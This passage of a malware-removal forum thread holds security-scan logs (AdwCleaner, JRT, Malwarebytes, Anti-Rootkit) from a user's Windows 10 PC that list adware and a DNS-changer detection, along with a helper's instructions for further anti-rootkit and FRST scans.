[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nps.pastaleads.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pastaleads.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\softonic.com
***** [ Web browsers ] *****
[-] [C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : booedmolknjekdopkepjjeckmjkdpfgl
[-] [C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : flpcjncodpafbgdpnkljologafpionhb
*************************
:: "Tracing" keys removed
:: Winsock settings cleared
*************************
C:\AdwCleaner\AdwCleaner[C1].txt - [5290 bytes] - [01/03/2016 12:31:36]
C:\AdwCleaner\AdwCleaner[S1].txt - [5161 bytes] - [01/03/2016 12:27:52]
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [5436 bytes] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.3 (02.09.2016)
Operating System: Windows 10 Home x64
Ran by Kym (Administrator) on 01-03-16 at 12:35:19.03
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File System: 4
Successfully deleted: C:\ai_recyclebin (Folder)
Successfully deleted: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage-journal (File)
Successfully deleted: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage (File)
Successfully deleted: C:\Users\Kym\AppData\Roaming\speedrunnerslog.txt (File)
Registry: 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 01-03-16 at 12:36:57.23
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CKScanner 2.5 - Additional Security Risks - These are not necessarily bad
c:\windows\autokms\autokms.exe
scanner sequence 3.AP.11.PANARZ
----- EOF -----
Malwarebytes Anti-Malware
www.malwarebytes.org
Scan Date: 01-03-16
Scan Time: 12:43 PM
Logfile:
Administrator: Yes
Version: 2.2.0.1024
Malware Database: v2016.02.29.05
Rootkit Database: v2016.02.27.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
OS: Windows 10
CPU: x64
File System: NTFS
User: Kym
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 375123
Time Elapsed: 3 min, 50 sec
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
Processes: 0
(No malicious items detected)
Modules: 0
(No malicious items detected)
Registry Keys: 13
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
PUP.Optional.AdvancedPCCare, HKLM\SOFTWARE\MICROSOFT\TRACING\advancedpccare_RASAPI32, Quarantined, [a0d9b3b3fd9ce056981b6be312f22fd1],
PUP.Optional.AdvancedPCCare, HKLM\SOFTWARE\MICROSOFT\TRACING\advancedpccare_RASMANCS, Quarantined, [3742264028713df953602a24798ba65a],
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR , Quarantined, [b7c29fc762372b0b875778a3e71d8b75],
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}, Quarantined, [7207c79f6b2e1e18b00668f612f27a86],
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{cf2797aa-b7ec-e311-8ed9-005056c00008}, Quarantined, [5c1d73f31e7b64d2d0e780de3dc71be5],
PUP.Optional.WinYahoo, HKLM\SOFTWARE\PCV-VARS, Quarantined, [9bdeb5b10792b284f106095a0004f30d],
PUP.Optional.WindowsMangerProtect, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\WindowsMangerProtect, Quarantined, [5b1ee97d21782c0a9a4232eebd470000],
Registry Values: 6
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [7ffaa6c01b7eee48a03d79a254b034cc]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [4c2d2a3ce4b572c436a79c7f07fdc937]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [5f1a94d2c1d86fc722bbd8438b79bf41]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\iexplore.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [a3d61056ff9a5adccd10be5d877d35cb]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [b7c29fc762372b0b875778a3e71d8b75]
PUP.Optional.WinYahoo, HKLM\SOFTWARE\PCV-VARS|affiliateid, Quarantined, [9bdeb5b10792b284f106095a0004f30d],
Registry Data: 1
Trojan.DNSChanger.DNSRst, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, 82.163.143.171 82.163.142.173, Good: (8.8.8.8), Bad: (82.163.143.171 82.163.142.173),Replaced,[48311e48d6c36ec8783ac13f1fe6cc34]
Folders: 0
(No malicious items detected)
Files: 8
PUP.Optional.BestPriceNinja, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage, Quarantined, [f1886cfa9504d462b6818ad9c24243bd],
PUP.Optional.BestPriceNinja, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage-journal, Quarantined, [75048adcdbbe48ee092e70f312f2e41c],
PUP.Optional.eShopComp, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.eshopcomp.com_0.localstorage, Quarantined, [54251a4c8a0f4fe75ac485e3de26f60a],
PUP.Optional.eShopComp, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.eshopcomp.com_0.localstorage-journal, Quarantined, [b3c60b5b09901224f12d3a2e3cc88f71],
PUP.Optional.CrossRider, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Quarantined, [cdacabbb930658dee19ce08bd430bc44],
PUP.Optional.CrossRider, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, Quarantined, [1564283e1b7e3bfb4c3157149e66a15f],
PUP.Optional.UTop, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_utop.it_0.localstorage, Quarantined, [a5d4283e1c7da591102e0f652dd7c63a],
PUP.Optional.UTop, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_utop.it_0.localstorage-journal, Quarantined, [1e5b5e0829708caaaf8f660e867eb14f],
Physical Sectors: 0
(No malicious items detected)
(end)
c:\windows\autokms\autokms.exe
The above file can be related to a cracked version of Windows or Microsoft office.
Is your version legit?
Tell me what your computer is doing now?
kym.preston
2016-03-01, 12:05
My version isn't legit, i used a cracked version. However i do have a legit windows 7 CD and serial if you think i should reinstall?
Some websites are fine, but others are constantly spammed by ads. Would you like me to send a screenshot?
We do not support the use of Pirated-Warez-Keygens-Cracked software.
If seeking help in our Malware removal forum please know that users who have programs obtained by such methods will be asked to remove them, since our help could otherwise be seen as aiding copyright violations. In doing the crack, the 'cracker' has broken the 'End User License Agreement' (EULA) of the product.
You will need to remove your cracked version of Microsoft office.
~~~~~~~~~~~~~~~~~~~~
http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif Malwarebytes Anti-Rootkit
Download Malwarebytes Anti-Rootkit (http://downloads.malwarebytes.org/file/mbar)
Once the file has been downloaded, right click on the downloaded file and select the Extract all menu option.
Follow the instructions to extract the ZIP file to a folder called mbar-versionnumber on your desktop.
Once the ZIP file has been extracted, open the folder and when that folder opens, double-click on the mbar folder.
Double-click on the mbar.exe file to launch Malwarebytes Anti-Rootkit.
After you double-click on the mbar.exe file, you may receive a User Account Control (UAC) message if you are sure you wish to allow the program to run. Please allow to start Malwarebytes Anti-Rootkit correctly.
Malwarebytes Anti-Rootkit will now install necessary drivers that are required for the program to operate correctly.
If you receive a DDA driver message like could not load DDA driver, click on the Yes button and Malwarebytes Anti-Rootkit will now restart your computer and will start automatically.
http://i1269.photobucket.com/albums/jj590/OCD-WTT/MBAMAnti-Rootkit1_zps4613be8c.png
Please click by the introduction screen on the Next button to continue.
http://i1269.photobucket.com/albums/jj590/OCD-WTT/MBAMAnti-Rootkit2update_zpsf85fca28.png
Next you will see the Update Database screen.
Click on the Update button so Malwarebytes Anti-Rootkit can download the latest definition updates.
http://i1269.photobucket.com/albums/jj590/OCD-WTT/MBAMAnti-Rootkitupdatecomplete_zpscf9f4cdb.png
When the update has finished, click on the Next button.
http://i1269.photobucket.com/albums/jj590/OCD-WTT/MBAMAnti-Rootkitscan_zps9b346fe7.png
Next you can select some basic scanning options. Make sure the Drivers, Sectors, and System scan targets are selected before you click on the Scan button.
Malwarebytes Anti-Rootkit will now start scanning your computer for rootkits. This scan can take some time, so please be patient.
http://i1269.photobucket.com/albums/jj590/OCD-WTT/MBAMAnti-Rootkitscan-results_zps9f0fdf8e.png
When the scan with Malwarebytes Anti-Rootkit is finished, the program will display a screen with the results from the scan.
Make sure everything is selected and that the option to create a restore point is checked.
Next click on the Cleanup button. Malwarebytes Anti-Rootkit will then prompt you to reboot your computer.
Click on Yes button to restart your computer.
There will now be two log files created in the mbar folder called system-log.txt and one that starts with mbar-log.
The mbar-log file will always start with mbar-log, but the rest will be named using a timestamp indicating the time it was run.
For example, mbar-log-2012-11-12 (19-13-32).txt corresponds to mbar-log-year-month-day (hour-minute-second).txt.
The system-log.txt contains information about each time you have run MBAR and contains diagnostic information from the program.
~~~~~~~~~~~
I need to see a fresh run of Farbar Recovery Scan Tool.
Right-Click FRST.exe / FRST64.exe and select http://i.imgur.com/AVOiBNU.jpg Run as administrator to run the programme.
Click Yes to the disclaimer.
Ensure the Addition.txt box is checked.
Click the Scan button and let the programme run.
Upon completion, click OK, then OK on the Addition.txt pop up screen.
Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply.
kym.preston
2016-03-01, 13:20
The Malwarebytes Anti-Rootkit finished the scan and said "Scan Finished: No malware found!".
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
Database version:
main: v2016.03.01.04
rootkit: v2016.02.27.01
Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16683
Kym :: KYM-PC [administrator]
01-03-16 9:58:00 PM
mbar-log-2016-03-01 (21-58-00).txt
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 392185
Time elapsed: 10 minute(s), 43 second(s)
Memory Processes Detected: 0
(No malicious items detected)
Memory Modules Detected: 0
(No malicious items detected)
Registry Keys Detected: 0
(No malicious items detected)
Registry Values Detected: 0
(No malicious items detected)
Registry Data Items Detected: 0
(No malicious items detected)
Folders Detected: 0
(No malicious items detected)
Files Detected: 0
(No malicious items detected)
Physical Sectors Detected: 0
(No malicious items detected)
(end)
---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.09.3.1001
(c) Malwarebytes Corporation 2011-2012
OS version: 10.0.9200 Windows 10 x64
Account is Administrative
Internet Explorer version: 11.0.10240.16683
File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED, F:\ DRIVE_FIXED
CPU speed: 3.392000 GHz
Memory total: 17061519360, free: 14123868160
Downloaded database version: v2016.03.01.04
Downloaded database version: v2016.02.27.01
Downloaded database version: v2016.02.22.02
=======================================
Initializing...
Driver version: 0.3.0.4
------------ Kernel report ------------
03/01/2016 21:57:55
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kd.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\System32\drivers\werkernel.sys
\SystemRoot\System32\drivers\CLFS.SYS
\SystemRoot\System32\drivers\tm.sys
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\BOOTVID.dll
\SystemRoot\System32\drivers\cmimcext.sys
\SystemRoot\System32\drivers\ntosext.sys
\SystemRoot\system32\CI.dll
\SystemRoot\System32\drivers\msrpc.sys
\SystemRoot\System32\drivers\FLTMGR.SYS
\SystemRoot\System32\drivers\ksecdd.sys
\SystemRoot\System32\drivers\clipsp.sys
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\System32\Drivers\acpiex.sys
\SystemRoot\System32\Drivers\WppRecorder.sys
\SystemRoot\System32\Drivers\cng.sys
\SystemRoot\System32\drivers\ACPI.sys
\SystemRoot\System32\drivers\WMILIB.SYS
\SystemRoot\system32\drivers\WindowsTrustedRT.sys
\SystemRoot\System32\drivers\WindowsTrustedRTProxy.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\drivers\dvpmielc.sys
\SystemRoot\System32\drivers\msisadrv.sys
\SystemRoot\System32\drivers\pci.sys
\SystemRoot\System32\drivers\vdrvroot.sys
\SystemRoot\system32\drivers\pdc.sys
\SystemRoot\system32\drivers\CEA.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\System32\drivers\spaceport.sys
\SystemRoot\System32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\System32\drivers\iaStorA.sys
\SystemRoot\System32\drivers\storport.sys
\SystemRoot\System32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\Wof.sys
\SystemRoot\System32\Drivers\PxHlpa64.sys
\SystemRoot\System32\Drivers\NTFS.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\System32\drivers\wfplwfs.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\System32\drivers\volsnap.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\System32\drivers\disk.sys
\SystemRoot\System32\drivers\CLASSPNP.SYS
\SystemRoot\System32\Drivers\aswVmm.sys
\SystemRoot\System32\Drivers\aswRvrt.sys
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\drivers\cdrom.sys
\SystemRoot\system32\drivers\filecrypt.sys
\SystemRoot\system32\drivers\tbs.sys
\SystemRoot\system32\drivers\aswSP.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\BasicDisplay.sys
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\BasicRender.sys
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\drivers\aswRdr2.sys
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\drivers\vwififlt.sys
\SystemRoot\System32\drivers\pacer.sys
\SystemRoot\system32\drivers\netbios.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\System32\drivers\npsvctrig.sys
\SystemRoot\System32\drivers\mssmbios.sys
\SystemRoot\System32\drivers\gpuenergydrv.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\AppleCharger.sys
\SystemRoot\system32\DRIVERS\ahcache.sys
\SystemRoot\System32\DriverStore\FileRepository\compositebus.inf_amd64_98334ba6e76853ba\CompositeBus.sys
\SystemRoot\System32\drivers\kdnic.sys
\SystemRoot\System32\drivers\umbus.sys
\SystemRoot\system32\DRIVERS\atikmpag.sys
\SystemRoot\system32\DRIVERS\atikmdag.sys
\SystemRoot\System32\drivers\HDAudBus.sys
\SystemRoot\System32\drivers\portcls.sys
\SystemRoot\System32\drivers\drmk.sys
\SystemRoot\System32\drivers\ks.sys
\SystemRoot\system32\DRIVERS\igdkmd64.sys
\SystemRoot\System32\drivers\USBXHCI.SYS
\SystemRoot\system32\drivers\ucx01000.sys
\SystemRoot\system32\DRIVERS\TeeDriverx64.sys
\SystemRoot\System32\drivers\usbehci.sys
\SystemRoot\System32\drivers\USBPORT.SYS
\SystemRoot\System32\drivers\rt640x64.sys
\SystemRoot\System32\drivers\serial.sys
\SystemRoot\System32\drivers\serenum.sys
\SystemRoot\System32\drivers\parport.sys
\SystemRoot\system32\DRIVERS\GEARAspiWDM.sys
\SystemRoot\System32\drivers\intelppm.sys
\SystemRoot\System32\drivers\XtuAcpiDriver.sys
\SystemRoot\system32\DRIVERS\serscan.sys
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\System32\drivers\NdisVirtualBus.sys
\SystemRoot\System32\DriverStore\FileRepository\swenum.inf_amd64_2a699e44676b7781\swenum.sys
\SystemRoot\system32\drivers\LGBusEnum.sys
\SystemRoot\system32\drivers\LGJoyXlCore.sys
\SystemRoot\System32\drivers\rdpbus.sys
\SystemRoot\System32\drivers\usbhub.sys
\SystemRoot\System32\drivers\USBD.SYS
\SystemRoot\system32\drivers\AtihdWT6.sys
\SystemRoot\system32\DRIVERS\IntcDAud.sys
\SystemRoot\System32\drivers\UsbHub3.sys
\SystemRoot\system32\drivers\RTKVHD64.sys
\SystemRoot\System32\drivers\USBSTOR.SYS
\SystemRoot\System32\drivers\usbccgp.sys
\SystemRoot\System32\drivers\rzmpos.sys
\SystemRoot\System32\drivers\hidusb.sys
\SystemRoot\System32\drivers\HIDCLASS.SYS
\SystemRoot\System32\drivers\HIDPARSE.SYS
\SystemRoot\system32\drivers\usbaudio.sys
\SystemRoot\System32\drivers\mouhid.sys
\SystemRoot\System32\drivers\rzudd.sys
\SystemRoot\System32\drivers\mouclass.sys
\SystemRoot\System32\drivers\kbdhid.sys
\SystemRoot\System32\drivers\kbdclass.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\win32kfull.sys
\SystemRoot\System32\win32kbase.sys
\SystemRoot\System32\Drivers\dump_diskdump.sys
\SystemRoot\System32\Drivers\dump_iaStorA.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\System32\drivers\dxgmms2.sys
\SystemRoot\System32\drivers\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\System32\cdd.dll
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\drivers\storqosflt.sys
\SystemRoot\system32\drivers\aswMonFlt.sys
\SystemRoot\system32\drivers\WudfPf.sys
\SystemRoot\system32\DRIVERS\WUDFRd.sys
\SystemRoot\System32\drivers\WpdUpFltr.sys
\SystemRoot\system32\drivers\lltdio.sys
\SystemRoot\system32\drivers\mslldp.sys
\SystemRoot\system32\drivers\aswStm.sys
\SystemRoot\system32\drivers\rspndr.sys
\SystemRoot\system32\drivers\mmcss.sys
\SystemRoot\System32\drivers\condrv.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\drivers\aswHwid.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\??\C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\??\C:\Windows\system32\drivers\LMIRfsDriver.sys
\??\C:\WINDOWS\system32\drivers\mbam.sys
\SystemRoot\system32\drivers\Ndu.sys
\SystemRoot\system32\drivers\mqac.sys
\SystemRoot\system32\drivers\peauth.sys
\??\C:\WINDOWS\system32\drivers\rzpmgrk.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\??\C:\WINDOWS\system32\drivers\rzpnk.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\??\C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys
\SystemRoot\System32\drivers\tunnel.sys
\SystemRoot\system32\drivers\LGVirHid.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
----------- End -----------
Done!
Scan started
Database versions:
main: v2016.03.01.04
rootkit: v2016.02.27.01
<<<2>>>
Physical Sector Size: 512
Drive: 1, DevicePointer: 0xffffe0001f007060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
--------- Disk Stack ------
DevicePointer: 0xffffe0001f008300, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffe0001f007060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
DevicePointer: 0xffffe0001ca1e690, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0001ca23040, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0001ca22060, DeviceName: \Device\00000030\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffe0001f009060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
--------- Disk Stack ------
DevicePointer: 0xffffe0001f009b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffe0001f009060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
DevicePointer: 0xffffe0001ca1ae40, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0001ca23760, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0001ca26060, DeviceName: \Device\0000002f\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 0
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 4E0A8E17
Partition information:
Partition 0 type is Primary (0x7)
Partition is NOT ACTIVE.
Partition starts at LBA: 206848 Numsec = 1953312768
Partition is not bootable
Partition file system is NTFS
Partition 1 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Partition 2 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Partition 3 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Disk Size: 1000204886016 bytes
Sector size: 512 bytes
Done!
Drive 1
This is a System drive
Scanning MBR on drive 1...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 4B95E549
Partition information:
Partition 0 type is Primary (0x7)
Partition is ACTIVE.
Partition starts at LBA: 206848 Numsec = 234232752
Partition is bootable
Partition file system is NTFS
Partition 1 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Partition 2 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Partition 3 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Disk Size: 120034123776 bytes
Sector size: 512 bytes
Done!
Physical Sector Size: 512
Drive: 2, DevicePointer: 0xffffe00020a38060, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
--------- Disk Stack ------
DevicePointer: 0xffffe00020a38b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffe00020a38060, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
DevicePointer: 0xffffe00020a07b10, DeviceName: \Device\00000041\, DriverName: \Driver\USBSTOR\
------------ End ----------
Alternate DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 2
Scanning MBR on drive 2...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 908BDE7D
Partition information:
Partition 0 type is Primary (0x7)
Partition is NOT ACTIVE.
Partition starts at LBA: 2048 Numsec = 3907027116
Partition is not bootable
Partition file system is NTFS
Partition 1 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Partition 2 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Partition 3 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Partition is not bootable
Disk Size: 2000398933504 bytes
Sector size: 512 bytes
Done!
Physical Sector Size: 0
Drive: 3, DevicePointer: 0xffffe00021920060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\disk\
--------- Disk Stack ------
DevicePointer: 0xffffe00021920b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffe00021920060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\disk\
DevicePointer: 0xffffe000209bfb10, DeviceName: \Device\00000047\, DriverName: \Driver\USBSTOR\
------------ End ----------
File "C:\WINDOWS\System32\KERNELBASE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\KERNELBASE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\apphelp.dll" is sparse (flags = 32768)
